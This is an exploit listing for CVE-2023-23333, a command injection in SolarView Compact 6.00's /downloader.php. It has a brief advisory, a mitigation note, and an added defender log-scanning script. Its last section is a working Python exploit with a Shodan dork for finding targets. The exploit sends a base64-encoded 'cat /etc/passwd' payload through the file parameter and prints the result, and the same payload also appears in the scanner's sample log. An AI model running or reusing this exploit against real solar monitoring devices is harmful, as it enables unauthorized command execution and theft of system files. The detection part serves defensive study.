Vendor: SolarView Compact
By: ByteHunter
CVSS: 8.1 (CRITICAL)
Command Injection (CWE-78)
Product Name: SolarView Compact
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE: CVE-2023-23333
CPE: a:solarview:compact:6.00

SolarView Compact 6.00 – Command Injection

SolarView Compact 6.00 allows remote attackers to execute arbitrary commands via a crafted HTTP request to the /downloader.php file. This vulnerability has been assigned CVE-2023-23333.

Mitigation:

Ensure input validation and sanitization in the application to prevent command injections. Regularly update to the latest version to patch known vulnerabilities.
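
A defender-side log check for the request described above, as an added example that is not part of the original advisory or exploit code: it flags access-log requests to /downloader.php whose file parameter contains shell metacharacters after percent-decoding. The "combined"-style log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Source, request target and status from a "combined"-style access log line (assumed format).
LINE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Raw `file` parameter, read from the undecoded query so ';' is never treated as a separator.
FILE_PARAM = re.compile(r'(?:^|&)file=([^&]*)')
# Shell metacharacters and control bytes that a plain download file name never needs.
SHELL_META = re.compile(r'[;|&`<>\x00-\x1f]|\$[({]')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2560 -> %60 -> `) is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (source, status, decoded file value) for each suspicious downloader.php request."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.lower().endswith("/downloader.php"):
            continue
        for raw in FILE_PARAM.findall(parts.query):
            value = decode_fully(raw)
            if SHELL_META.search(value):
                hits.append((m["src"], int(m["status"]), value))
    return hits

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:44 +0000] "GET /downloader.php?file=report_2024.zip HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Mar/2024:10:02:10 +0000] "GET /downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip HTTP/1.1" 200 1873',
    '198.51.100.7 - - [12/Mar/2024:10:03:02 +0000] "GET /index.php?file=notes;v2.txt HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for src, status, value in scan(SAMPLE_LOG):
        print(f"{src} status={status} file={value!r}")
```

A hit only shows that the request was made; whether the device executed it has to be established from the response or from the host itself.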

Exploit-DB raw data:

#- Exploit Title: SolarView Compact 6.00 - Command Injection
#- Shodan Dork: http.html:"solarview compact"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: 6.00
#- Tested on: 6.00
#- CVE : CVE-2023-23333


import argparse
import requests

def vuln_check(ip_address, port):
    url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
    response = requests.get(url)
    if response.status_code == 200:
        output = response.text
        if "root" in output:
            print("Vulnerability detected: Command Injection possible.")
            print(f"passwd file content:\n{response.text}")
        else:
            print("No vulnerability detected.")
    else:
        print("Error: Unable to fetch response.")

def main():
    parser = argparse.ArgumentParser(description="SolarView Compact Command Injection")
    parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
    parser.add_argument("-p", "--port", help="Port of the target device (default: 80)", default=80, type=int)
    args = parser.parse_args()
    
    ip_address = args.ip
    port = args.port
    vuln_check(ip_address, port)

if __name__ == "__main__":
    main()